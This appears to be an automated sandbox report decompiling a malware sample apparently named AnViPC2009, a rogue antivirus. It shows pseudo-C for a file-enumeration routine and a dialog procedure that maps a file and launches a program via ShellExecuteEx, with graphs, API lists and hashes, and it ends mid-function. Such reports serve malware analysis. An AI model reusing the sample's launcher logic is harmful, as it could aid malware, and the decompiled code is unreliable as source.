                                                                                                                                                      control_flow_graph 1118 405bd2-405bec call 406e67 1121 405bf2-405bf7 1118->1121 1122 405dae-405db3 1118->1122 1123 405bf9-405bfd 1121->1123 1124 405c0e-405c19 call 40e218 1121->1124 1125 405db5-405db8 1122->1125 1126 405dc9-405dd4 call 40e1e9 1122->1126 1123->1124 1128 405bff-405c0c call 40e40c 1123->1128 1133 405c1e-405c2e 1124->1133 1125->1126 1130 405dba-405dc7 call 40a450 1125->1130 1131 405dd9-405de9 1126->1131 1128->1133 1130->1131 1136 405e21-405e2c FindNextFileA 1131->1136 1137 405deb-405dfd FindFirstFileA 1131->1137 1139 405c30-405c42 FindFirstFileW 1133->1139 1140 405c64-405c6f FindNextFileW 1133->1140 1145 405e43-405e46 1136->1145 1146 405e2e-405e3d GetLastError 1136->1146 1143 405e4c-405f54 call 40a450 call 4073b4 call 40a450 call 40e218 call 401030 call 40a450 call 40e04d * 3 call 40dfa5 call 40db6d 1137->1143 1144 405dff-405e08 GetLastError 1137->1144 1147 405c44-405c4d GetLastError 1139->1147 1148 405c8f-405d9e call 40e40c call 40740b call 40e40c call 40e1e9 call 401030 call 40e1e9 call 40e04d * 3 call 40dfa5 call 40db8b 1139->1148 1141 405c71-405c80 GetLastError 1140->1141 1142 405c86-405c89 1140->1142 1141->1142 1142->1148 1149 405f5b-405f6c 1142->1149 1143->1149 1201 405f56-405f58 1143->1201 1151 405e14 1144->1151 1152 405e0a 1144->1152 1145->1143 1145->1149 1146->1145 1147->1151 1154 405c53-405c56 1147->1154 1148->1149 1202 405da4-405da9 1148->1202 1159 405e16-405e1c 1151->1159 1158 405e0d 1152->1158 1154->1151 1156 405c5c-405c5f 1154->1156 1156->1158 1158->1151 1162 405e0f-405e12 1158->1162 1159->1149 1162->1159 1201->1149 1202->1149
                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                      			E00405BD2(void* __ecx, intOrPtr __edx, void* __eflags) {
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				char* _t98;
                                                                                                                                                      				void* _t134;
                                                                                                                                                      				char _t136;
                                                                                                                                                      				short* _t140;
                                                                                                                                                      				intOrPtr _t169;
                                                                                                                                                      				void* _t175;
                                                                                                                                                      				long _t176;
                                                                                                                                                      				signed int _t179;
                                                                                                                                                      				void* _t180;
                                                                                                                                                      				short* _t182;
                                                                                                                                                      				void* _t183;
                                                                                                                                                      				void* _t186;
                                                                                                                                                      				intOrPtr _t197;
                                                                                                                                                      				short* _t204;
                                                                                                                                                      				intOrPtr _t206;
                                                                                                                                                      				void* _t208;
                                                                                                                                                      				void* _t210;
                                                                                                                                                      				void* _t221;
                                                                                                                                                      
                                                                                                                                                      				_t197 = __edx;
                                                                                                                                                      				_t186 = __ecx;
                                                                                                                                                      				_t208 = _t210 - 0x68;
                                                                                                                                                      				_push(_t179);
                                                                                                                                                      				if(E00406E67() == 0) {
                                                                                                                                                      					_t98 =  *((intOrPtr*)(_t208 + 0x74));
                                                                                                                                                      					if(_t98 == 0 ||  *_t98 == 0) {
                                                                                                                                                      						E0040E1E9(_t186,  *((intOrPtr*)(_t208 + 0x78)), _t208 - 0x5e8, 0x1000000);
                                                                                                                                                      					} else {
                                                                                                                                                      						E0040A450(_t208 - 0x5e8, _t98);
                                                                                                                                                      					}
                                                                                                                                                      					_t206 =  *((intOrPtr*)(_t208 + 0x7c));
                                                                                                                                                      					_t180 = _t179 | 0xffffffff;
                                                                                                                                                      					_push(_t208 - 0xd8);
                                                                                                                                                      					if( *(_t208 + 0x70) != _t180) {
                                                                                                                                                      						if(FindNextFileA( *(_t208 + 0x70), ??) == 0) {
                                                                                                                                                      							 *(_t208 + 0x70) = _t180;
                                                                                                                                                      							 *((char*)(_t206 + 0x109c)) = GetLastError() & 0xffffff00 | _t131 != 0x00000012;
                                                                                                                                                      						}
                                                                                                                                                      						if( *(_t208 + 0x70) == _t180) {
                                                                                                                                                      							goto L32;
                                                                                                                                                      						} else {
                                                                                                                                                      							goto L30;
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						_t134 = FindFirstFileA(_t208 - 0x5e8, ??);
                                                                                                                                                      						 *(_t208 + 0x70) = _t134;
                                                                                                                                                      						if(_t134 != _t180) {
                                                                                                                                                      							L30:
                                                                                                                                                      							E0040A450(_t206, _t208 - 0x5e8);
                                                                                                                                                      							E0040A450(E004073B4(_t206), _t208 - 0xac);
                                                                                                                                                      							_t182 = _t206 + 0x400;
                                                                                                                                                      							E0040E218(_t206, _t182, 0x1000000);
                                                                                                                                                      							 *((intOrPtr*)(_t206 + 0xc00)) = E00401030( *((intOrPtr*)(_t208 - 0xbc)), 0, 0, 1) +  *((intOrPtr*)(_t208 - 0xb8));
                                                                                                                                                      							 *((intOrPtr*)(_t206 + 0xc08)) =  *((intOrPtr*)(_t208 - 0xd8));
                                                                                                                                                      							asm("adc edx, edi");
                                                                                                                                                      							 *((intOrPtr*)(_t206 + 0xc04)) = _t197;
                                                                                                                                                      							E0040A450(_t206 + 0xc80, _t208 + 0x58);
                                                                                                                                                      							 *((intOrPtr*)(_t206 + 0x1080)) =  *((intOrPtr*)(_t208 - 0xd4));
                                                                                                                                                      							 *((intOrPtr*)(_t206 + 0x1084)) =  *((intOrPtr*)(_t208 - 0xd0));
                                                                                                                                                      							 *((intOrPtr*)(_t206 + 0x1088)) =  *((intOrPtr*)(_t208 - 0xcc));
                                                                                                                                                      							 *((intOrPtr*)(_t206 + 0x108c)) =  *((intOrPtr*)(_t208 - 0xc8));
                                                                                                                                                      							 *((intOrPtr*)(_t206 + 0x1090)) =  *((intOrPtr*)(_t208 - 0xc4));
                                                                                                                                                      							 *((intOrPtr*)(_t206 + 0x1094)) =  *((intOrPtr*)(_t208 - 0xc0));
                                                                                                                                                      							E0040E04D(_t182, _t206 + 0xc14, _t208 - 0xc4);
                                                                                                                                                      							E0040E04D(_t182, _t206 + 0xc38, _t208 - 0xd4);
                                                                                                                                                      							E0040E04D(_t182, _t206 + 0xc5c, _t208 - 0xcc);
                                                                                                                                                      							 *((intOrPtr*)(_t206 + 0xc0c)) = E0040DFA5(_t206 + 0xc14);
                                                                                                                                                      							if(E0040DB6D(_t206) != 0) {
                                                                                                                                                      								 *_t182 = 0;
                                                                                                                                                      							}
                                                                                                                                                      							L32:
                                                                                                                                                      							 *(_t206 + 0x1098) =  *(_t206 + 0x1098) & 0x00000000;
                                                                                                                                                      							return  *(_t208 + 0x70);
                                                                                                                                                      						}
                                                                                                                                                      						if(GetLastError() == 2) {
                                                                                                                                                      							L25:
                                                                                                                                                      							_t136 = 0;
                                                                                                                                                      							L26:
                                                                                                                                                      							 *((char*)(_t206 + 0x109c)) = _t136;
                                                                                                                                                      							goto L32;
                                                                                                                                                      						}
                                                                                                                                                      						L23:
                                                                                                                                                      						if(_t221 == 0) {
                                                                                                                                                      							goto L25;
                                                                                                                                                      						}
                                                                                                                                                      						_t136 = 1;
                                                                                                                                                      						goto L26;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t140 =  *((intOrPtr*)(_t208 + 0x78));
                                                                                                                                                      				if(_t140 == 0 ||  *_t140 == 0) {
                                                                                                                                                      					E0040E218( *((intOrPtr*)(_t208 + 0x74)), _t208 - 0x9e8, 0x1000000);
                                                                                                                                                      				} else {
                                                                                                                                                      					E0040E40C(_t208 - 0x9e8, _t140);
                                                                                                                                                      				}
                                                                                                                                                      				_t206 =  *((intOrPtr*)(_t208 + 0x7c));
                                                                                                                                                      				_t183 = _t179 | 0xffffffff;
                                                                                                                                                      				_push(_t208 - 0x1e8);
                                                                                                                                                      				if( *(_t208 + 0x70) != _t183) {
                                                                                                                                                      					if(FindNextFileW( *(_t208 + 0x70), ??) == 0) {
                                                                                                                                                      						 *(_t208 + 0x70) = _t183;
                                                                                                                                                      						 *((char*)(_t206 + 0x109c)) = GetLastError() & 0xffffff00 | _t172 != 0x00000012;
                                                                                                                                                      					}
                                                                                                                                                      					if( *(_t208 + 0x70) == _t183) {
                                                                                                                                                      						goto L32;
                                                                                                                                                      					} else {
                                                                                                                                                      						goto L13;
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					_t175 = FindFirstFileW(_t208 - 0x9e8, ??); // executed
                                                                                                                                                      					 *(_t208 + 0x70) = _t175;
                                                                                                                                                      					if(_t175 != _t183) {
                                                                                                                                                      						L13:
                                                                                                                                                      						E0040E40C(_t206 + 0x400, _t208 - 0x9e8);
                                                                                                                                                      						E0040E40C(E0040740B(_t206 + 0x400), _t208 - 0x1bc);
                                                                                                                                                      						E0040E1E9(_t186, _t206 + 0x400, _t206, 0x1000000);
                                                                                                                                                      						 *((intOrPtr*)(_t206 + 0xc00)) = E00401030( *((intOrPtr*)(_t208 - 0x1cc)), 0, 0, 1) +  *((intOrPtr*)(_t208 - 0x1c8));
                                                                                                                                                      						 *((intOrPtr*)(_t206 + 0xc08)) =  *((intOrPtr*)(_t208 - 0x1e8));
                                                                                                                                                      						asm("adc edx, ebx");
                                                                                                                                                      						 *((intOrPtr*)(_t206 + 0xc04)) = _t197;
                                                                                                                                                      						E0040E1E9( *((intOrPtr*)(_t208 - 0x1c8)), _t208 + 0x4c, _t206 + 0xc80, 0x1000000);
                                                                                                                                                      						 *((intOrPtr*)(_t206 + 0x1080)) =  *((intOrPtr*)(_t208 - 0x1e4));
                                                                                                                                                      						 *((intOrPtr*)(_t206 + 0x1084)) =  *((intOrPtr*)(_t208 - 0x1e0));
                                                                                                                                                      						 *((intOrPtr*)(_t206 + 0x1088)) =  *((intOrPtr*)(_t208 - 0x1dc));
                                                                                                                                                      						 *((intOrPtr*)(_t206 + 0x108c)) =  *((intOrPtr*)(_t208 - 0x1d8));
                                                                                                                                                      						 *((intOrPtr*)(_t206 + 0x1090)) =  *((intOrPtr*)(_t208 - 0x1d4));
                                                                                                                                                      						 *((intOrPtr*)(_t206 + 0x1094)) =  *((intOrPtr*)(_t208 - 0x1d0));
                                                                                                                                                      						E0040E04D(0, _t206 + 0xc14, _t208 - 0x1d4);
                                                                                                                                                      						E0040E04D(0, _t206 + 0xc38, _t208 - 0x1e4);
                                                                                                                                                      						E0040E04D(0, _t206 + 0xc5c, _t208 - 0x1dc);
                                                                                                                                                      						_t169 = E0040DFA5(_t206 + 0xc14);
                                                                                                                                                      						_t204 = _t206 + 0x400;
                                                                                                                                                      						 *((intOrPtr*)(_t206 + 0xc0c)) = _t169;
                                                                                                                                                      						if(E0040DB8B(_t204) != 0) {
                                                                                                                                                      							 *_t204 = 0;
                                                                                                                                                      						}
                                                                                                                                                      						goto L32;
                                                                                                                                                      					}
                                                                                                                                                      					_t176 = GetLastError();
                                                                                                                                                      					if(_t176 == 2 || _t176 == 3) {
                                                                                                                                                      						goto L25;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t221 = _t176 - 0x12;
                                                                                                                                                      						goto L23;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      			}






















                                                                                                                                                      0x00405bd2
                                                                                                                                                      0x00405bd2
                                                                                                                                                      0x00405bd3
                                                                                                                                                      0x00405bdd
                                                                                                                                                      0x00405bec
                                                                                                                                                      0x00405dae
                                                                                                                                                      0x00405db3
                                                                                                                                                      0x00405dd4
                                                                                                                                                      0x00405dba
                                                                                                                                                      0x00405dc2
                                                                                                                                                      0x00405dc2
                                                                                                                                                      0x00405dd9
                                                                                                                                                      0x00405ddc
                                                                                                                                                      0x00405de5
                                                                                                                                                      0x00405de9
                                                                                                                                                      0x00405e2c
                                                                                                                                                      0x00405e2e
                                                                                                                                                      0x00405e3d
                                                                                                                                                      0x00405e3d
                                                                                                                                                      0x00405e46
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405deb
                                                                                                                                                      0x00405df2
                                                                                                                                                      0x00405df8
                                                                                                                                                      0x00405dfd
                                                                                                                                                      0x00405e4c
                                                                                                                                                      0x00405e54
                                                                                                                                                      0x00405e67
                                                                                                                                                      0x00405e6d
                                                                                                                                                      0x00405e75
                                                                                                                                                      0x00405e95
                                                                                                                                                      0x00405ea1
                                                                                                                                                      0x00405eb1
                                                                                                                                                      0x00405eb4
                                                                                                                                                      0x00405eba
                                                                                                                                                      0x00405ec5
                                                                                                                                                      0x00405ed1
                                                                                                                                                      0x00405edd
                                                                                                                                                      0x00405ee9
                                                                                                                                                      0x00405ef5
                                                                                                                                                      0x00405f01
                                                                                                                                                      0x00405f16
                                                                                                                                                      0x00405f28
                                                                                                                                                      0x00405f3a
                                                                                                                                                      0x00405f47
                                                                                                                                                      0x00405f54
                                                                                                                                                      0x00405f58
                                                                                                                                                      0x00405f58
                                                                                                                                                      0x00405f5b
                                                                                                                                                      0x00405f5b
                                                                                                                                                      0x00405f6c
                                                                                                                                                      0x00405f6c
                                                                                                                                                      0x00405e08
                                                                                                                                                      0x00405e14
                                                                                                                                                      0x00405e14
                                                                                                                                                      0x00405e16
                                                                                                                                                      0x00405e16
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405e16
                                                                                                                                                      0x00405e0d
                                                                                                                                                      0x00405e0d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405e11
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405e11
                                                                                                                                                      0x00405de9
                                                                                                                                                      0x00405bf2
                                                                                                                                                      0x00405bf7
                                                                                                                                                      0x00405c19
                                                                                                                                                      0x00405bff
                                                                                                                                                      0x00405c07
                                                                                                                                                      0x00405c07
                                                                                                                                                      0x00405c1e
                                                                                                                                                      0x00405c21
                                                                                                                                                      0x00405c2a
                                                                                                                                                      0x00405c2e
                                                                                                                                                      0x00405c6f
                                                                                                                                                      0x00405c71
                                                                                                                                                      0x00405c80
                                                                                                                                                      0x00405c80
                                                                                                                                                      0x00405c89
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405c30
                                                                                                                                                      0x00405c37
                                                                                                                                                      0x00405c3d
                                                                                                                                                      0x00405c42
                                                                                                                                                      0x00405c8f
                                                                                                                                                      0x00405c9d
                                                                                                                                                      0x00405cb0
                                                                                                                                                      0x00405cb8
                                                                                                                                                      0x00405cd8
                                                                                                                                                      0x00405ce4
                                                                                                                                                      0x00405cf5
                                                                                                                                                      0x00405cf8
                                                                                                                                                      0x00405cfe
                                                                                                                                                      0x00405d09
                                                                                                                                                      0x00405d15
                                                                                                                                                      0x00405d21
                                                                                                                                                      0x00405d2d
                                                                                                                                                      0x00405d39
                                                                                                                                                      0x00405d45
                                                                                                                                                      0x00405d5a
                                                                                                                                                      0x00405d6c
                                                                                                                                                      0x00405d7e
                                                                                                                                                      0x00405d85
                                                                                                                                                      0x00405d8a
                                                                                                                                                      0x00405d91
                                                                                                                                                      0x00405d9e
                                                                                                                                                      0x00405da6
                                                                                                                                                      0x00405da6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405d9e
                                                                                                                                                      0x00405c44
                                                                                                                                                      0x00405c4d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405c5c
                                                                                                                                                      0x00405c5c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405c5c
                                                                                                                                                      0x00405c4d

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406E67: GetVersionExA.KERNEL32(?), ref: 00406E8B
                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?,00000000,?,01000000,?,?,00000000), ref: 00405C37
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00405C44
                                                                                                                                                      • FindNextFileW.KERNEL32(?,?,00000000,?,01000000,?,?,00000000), ref: 00405C67
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00405C74
                                                                                                                                                        • Part of subcall function 0040E1E9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,00000000,?,?,0040515F,?,?,01000000,?), ref: 0040E203
                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?,00000002,?,01000000,?,?,00000000), ref: 00405DF2
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00405DFF
                                                                                                                                                      • FindNextFileA.KERNEL32(?,?,00000002,?,01000000,?,?,00000000), ref: 00405E24
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00405E31
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFileFindLast$FirstNext$ByteCharMultiVersionWide
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3067395930-0
                                                                                                                                                      • Opcode ID: f3f69437bd299231ee4952ecf933f72a1098c9994ee953a9bf584cb8bdaa0410
                                                                                                                                                      • Instruction ID: 1cf902d0640d0bfb9c10475f3d8c45b57b5720f228852893026f829341d92c2b
                                                                                                                                                      • Opcode Fuzzy Hash: f3f69437bd299231ee4952ecf933f72a1098c9994ee953a9bf584cb8bdaa0410
                                                                                                                                                      • Instruction Fuzzy Hash: 49A13C719006589BDB20EF75CC81BDB77F8AF04304F10496BE55AE3291DB78AA85CF68
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 0 40cc05-40cc38 call 401200 call 403059 5 40d08b-40d09e 0->5 6 40cc3e-40cc3f 0->6 7 40d0a0-40d0a9 SendMessageA 5->7 8 40d0af-40d0b6 5->8 9 40cc50-40cc52 6->9 10 40cc41-40cc46 6->10 7->8 11 40d0c8-40d13c call 40ba0f GetDlgItem GetWindowRect MapWindowPoints SetMenu CreateWindowExA 8->11 12 40d0b8-40d0c2 SendDlgItemMessageA 8->12 15 40d378-40d37c 9->15 13 40ccb1-40cccc GetDlgItemTextA 10->13 14 40cc48-40cc49 10->14 33 40d147-40d176 SetWindowPos DestroyWindow SendMessageA 11->33 34 40d13e-40d145 SetMenu 11->34 12->11 17 40cceb-40ccf1 13->17 18 40ccce-40ccd4 13->18 19 40cc88-40cc8e 14->19 20 40cc4b-40cc4e 14->20 27 40cd02-40cd14 GetDlgItem 17->27 28 40ccf3-40ccfd 17->28 24 40cce0 18->24 25 40ccd6 18->25 21 40cc90-40cca0 19->21 22 40cca2-40ccac 19->22 20->9 26 40cc57-40cc6e call 4098d0 call 402794 20->26 21->22 31 40cc80-40cc83 21->31 32 40cf7b-40cf7c 22->32 35 40cce2-40cce9 KiUserCallbackDispatcher 24->35 25->24 26->31 55 40cc70-40cc7a SetDlgItemTextA 26->55 29 40cd16-40cd35 SendMessageA * 2 27->29 30 40cd37-40cd59 SetFocus call 4058c1 27->30 37 40d01d-40d023 28->37 29->30 51 40cd6b-40cd81 SetCurrentDirectoryA 30->51 52 40cd5b-40cd60 GetLastError 30->52 31->15 32->35 42 40d183-40d18f SendMessageA 33->42 43 40d178-40d17d SendMessageA 33->43 41 40d195-40d1be GetCurrentDirectoryA GetDlgItem 34->41 35->31 37->24 40 40d029-40d02f 37->40 40->24 46 40d035-40d056 call 4098d0 SetDlgItemTextA 40->46 47 40d1c0 41->47 48 40d1c6-40d1fd SetWindowTextA call 40aad5 call 40ca76 41->48 42->41 43->42 64 40d058-40d05b 46->64 65 40d05d-40d06c 46->65 47->48 69 40d20d-40d213 48->69 70 40d1ff-40d208 call 40bf72 48->70 58 40cd83-40cd88 GetLastError 51->58 59 40cd8e-40cd95 call 406e67 51->59 56 40cd62-40cd65 52->56 57 40cd67 52->57 55->31 56->51 56->57 57->51 58->59 62 40cd8a 58->62 71 40cd97-40cd9d 59->71 72 40cdfd-40ce00 59->72 62->59 68 40d06e-40d086 call 4098d0 * 2 MessageBoxA 64->68 65->68 68->31 76 40d270-40d276 69->76 77 40d215-40d21b 69->77 70->69 71->72 80 40cd9f-40cda2 71->80 78 40cf81-40cfef call 40b908 call 40303b * 3 call 40bf72 * 2 call 40b2fb call 40bf72 72->78 79 40ce06-40ce0c 72->79 83 40d303-40d305 76->83 84 40d27c-40d284 call 40bf72 76->84 85 40d220-40d24b call 40a5bb call 4098d0 call 40a5bb 77->85 170 40cff1-40cff7 78->170 171 40d00f-40d017 call 40303b 78->171 86 40ce11-40ce1b 79->86 87 40ce0e 79->87 80->86 88 40cda4-40cddb GetTickCount wsprintfA call 404e8a call 40519f 80->88 92 40d306-40d30d 83->92 101 40d289-40d290 84->101 155 40d24d-40d253 85->155 95 40ce21-40ceb4 GetModuleFileNameA wsprintfA CreateFileMappingA 86->95 96 40cf2a-40cf75 call 4098d0 wsprintfA call 40321d call 4098d0 MessageBoxA 86->96 87->86 118 40cde0-40cde5 88->118 99 40d319-40d31f 92->99 100 40d30f-40d313 EnableWindow 92->100 104 40cee2-40ceee ShellExecuteExA 95->104 105 40ceb6-40cecd MapViewOfFile GetCommandLineA 95->105 96->32 110 40d321-40d32e call 40303b * 2 99->110 111 40d333-40d33a 99->111 100->99 112 40d292-40d298 101->112 113 40d2ba-40d2c3 101->113 107 40cef0-40cf11 WaitForInputIdle Sleep 104->107 108 40cf13 104->108 116 40ced9-40cedc UnmapViewOfFile 105->116 117 40cecf-40ced4 call 40dbc0 105->117 119 40cf17-40cf1a 107->119 108->119 110->111 124 40d33c-40d342 111->124 125 40d35e-40d364 111->125 112->113 122 40d29a-40d2b5 call 406d16 call 40a1de 112->122 126 40d2f4-40d301 call 40bf72 113->126 127 40d2c5-40d2df DialogBoxParamA 113->127 116->104 117->116 133 40cdf2-40cdf8 call 40503b 118->133 134 40cde7-40cdec GetLastError 118->134 135 40cf25-40cf28 119->135 136 40cf1c-40cf1f CloseHandle 119->136 122->113 124->125 141 40d344-40d34e 124->141 130 40d376 125->130 131 40d366-40d370 call 4098d0 SetDlgItemTextA 125->131 126->92 127->126 142 40d2e1-40d2ef EndDialog 127->142 130->15 131->130 133->72 134->133 145 40cdee 134->145 135->32 135->96 136->135 152 40d350-40d356 SendMessageA 141->152 153 40d358 PostMessageA 141->153 142->130 145->133 152->125 153->125 155->76 160 40d255-40d26b call 406d16 155->160 160->76 170->171 172 40cff9-40cfff 170->172 171->37 172->171 174 40d001-40d00a call 40bf72 172->174 174->171
                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                      			E0040CC05(void* __ecx, void* __edx, struct HWND__* _a4, struct HWND__* _a8, void* _a11, struct HWND__* _a12, void* _a15, void* _a16) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				struct tagPOINT _v20;
                                                                                                                                                      				struct _SHELLEXECUTEINFOA _v80;
                                                                                                                                                      				char _v1104;
                                                                                                                                                      				char _v2128;
                                                                                                                                                      				char _v2640;
                                                                                                                                                      				char _v5340;
                                                                                                                                                      				char _v5744;
                                                                                                                                                      				char _v13936;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				void* _t98;
                                                                                                                                                      				long _t99;
                                                                                                                                                      				long _t100;
                                                                                                                                                      				void* _t114;
                                                                                                                                                      				int _t117;
                                                                                                                                                      				CHAR* _t122;
                                                                                                                                                      				void* _t126;
                                                                                                                                                      				void* _t136;
                                                                                                                                                      				void* _t138;
                                                                                                                                                      				void* _t157;
                                                                                                                                                      				struct HWND__* _t160;
                                                                                                                                                      				void* _t163;
                                                                                                                                                      				void* _t165;
                                                                                                                                                      				void* _t166;
                                                                                                                                                      				intOrPtr _t182;
                                                                                                                                                      				CHAR* _t183;
                                                                                                                                                      				void* _t202;
                                                                                                                                                      				int _t204;
                                                                                                                                                      				CHAR* _t209;
                                                                                                                                                      				void* _t217;
                                                                                                                                                      				long _t219;
                                                                                                                                                      				long _t220;
                                                                                                                                                      				long _t221;
                                                                                                                                                      				void* _t224;
                                                                                                                                                      				void* _t228;
                                                                                                                                                      				void* _t232;
                                                                                                                                                      				intOrPtr _t233;
                                                                                                                                                      				intOrPtr _t234;
                                                                                                                                                      				void* _t239;
                                                                                                                                                      				struct HWND__* _t245;
                                                                                                                                                      				int _t247;
                                                                                                                                                      				void* _t249;
                                                                                                                                                      				void* _t255;
                                                                                                                                                      				struct HWND__* _t258;
                                                                                                                                                      				void* _t259;
                                                                                                                                                      
                                                                                                                                                      				_t244 = __edx;
                                                                                                                                                      				_t232 = __ecx;
                                                                                                                                                      				E00401200(0x366c);
                                                                                                                                                      				_t258 = _a4;
                                                                                                                                                      				E00403059(__edx, _t258, _a8, _a12, _a16, "STARTDLG", 0, 0); // executed
                                                                                                                                                      				_t98 = _a8 - 0x110;
                                                                                                                                                      				if(_t98 == 0) {
                                                                                                                                                      					_t99 =  *0x4192d4; // 0xb0335
                                                                                                                                                      					 *0x419f80 = _t258;
                                                                                                                                                      					 *0x419f7c = _t258;
                                                                                                                                                      					__eflags = _t99;
                                                                                                                                                      					if(_t99 != 0) {
                                                                                                                                                      						SendMessageA(_t258, 0x80, 1, _t99);
                                                                                                                                                      					}
                                                                                                                                                      					_t100 =  *0x4192d0; // 0x19050bc3
                                                                                                                                                      					__eflags = _t100;
                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                      						SendDlgItemMessageA(_t258, 0x69, 0x172, 0, _t100); // executed
                                                                                                                                                      					}
                                                                                                                                                      					E0040BA0F(_t244, __eflags, _t258);
                                                                                                                                                      					_a8 = GetDlgItem(_t258, 0x67);
                                                                                                                                                      					GetWindowRect(_a8,  &_v20);
                                                                                                                                                      					MapWindowPoints(0, _t258,  &_v20, 2);
                                                                                                                                                      					_t245 = SetMenu;
                                                                                                                                                      					SetMenu(_a8, 0);
                                                                                                                                                      					_t114 = CreateWindowExA(0, "RichEdit", 0x4125aa, 0x50a10844, _v20.x, _v20.y, _v12 - _v20 + 1, _v8 - _v20.y + 1, _t258, 0x67,  *0x414c78, 0); // executed
                                                                                                                                                      					_a12 = _t114;
                                                                                                                                                      					__eflags = _t114;
                                                                                                                                                      					if(_t114 != 0) {
                                                                                                                                                      						_t245 = _a12;
                                                                                                                                                      						SetWindowPos(_t245, _a8, 0, 0, 0, 0, 0x203);
                                                                                                                                                      						DestroyWindow(_a8); // executed
                                                                                                                                                      						_a8 = _t245;
                                                                                                                                                      						_t117 = SendMessageA(_t258, 0x31, 0, 0);
                                                                                                                                                      						__eflags = _t117;
                                                                                                                                                      						if(_t117 != 0) {
                                                                                                                                                      							SendMessageA(_t245, 0x30, _t117, 0); // executed
                                                                                                                                                      						}
                                                                                                                                                      						SendMessageA(_t245, 0x435, 0, 0x400000);
                                                                                                                                                      					} else {
                                                                                                                                                      						SetMenu(_a8, 0x67);
                                                                                                                                                      					}
                                                                                                                                                      					GetCurrentDirectoryA(0x400,  &_v2128);
                                                                                                                                                      					_a12 = GetDlgItem(_t258, 0x65);
                                                                                                                                                      					_t122 = 0x419f92;
                                                                                                                                                      					__eflags =  *0x419f92; // 0x0
                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                      						_t122 =  &_v2128;
                                                                                                                                                      					}
                                                                                                                                                      					SetWindowTextA(_a12, _t122); // executed
                                                                                                                                                      					E0040AAD5(_t232, __eflags, _a12); // executed
                                                                                                                                                      					 *0x41a814 = 0; // executed
                                                                                                                                                      					E0040CA76(0, _t244, _t245, _t258, __eflags, "C:\Users\hardz\Desktop\Endermanch@AnViPC2009.exe", "C:\Users\hardz\Desktop\Endermanch@AnViPC2009.exe", 0x41a818, 0x41a824); // executed
                                                                                                                                                      					__eflags =  *0x41a824;
                                                                                                                                                      					if( *0x41a824 > 0) {
                                                                                                                                                      						E0040BF72(_t244, _t258, _t258,  *0x41a818, 7); // executed
                                                                                                                                                      					}
                                                                                                                                                      					__eflags =  *0x41a814;
                                                                                                                                                      					if( *0x41a814 != 0) {
                                                                                                                                                      						L80:
                                                                                                                                                      						__eflags =  *0x41a824;
                                                                                                                                                      						if( *0x41a824 <= 0) {
                                                                                                                                                      							_t247 = 1;
                                                                                                                                                      							__eflags = 1;
                                                                                                                                                      							L89:
                                                                                                                                                      							__eflags =  *0x419f8c - 2;
                                                                                                                                                      							if( *0x419f8c == 2) {
                                                                                                                                                      								EnableWindow(_a12, 0);
                                                                                                                                                      							}
                                                                                                                                                      							__eflags =  *0x419f88; // 0x0
                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                      								E0040303B(_t258, 0x66, 0);
                                                                                                                                                      								E0040303B(_t258, 0x65, 0);
                                                                                                                                                      							}
                                                                                                                                                      							_t126 =  *0x419f8c; // 0x1
                                                                                                                                                      							__eflags = _t126;
                                                                                                                                                      							if(_t126 != 0) {
                                                                                                                                                      								__eflags =  *0x419f78; // 0x2
                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                      									_push(0);
                                                                                                                                                      									_push(_t247);
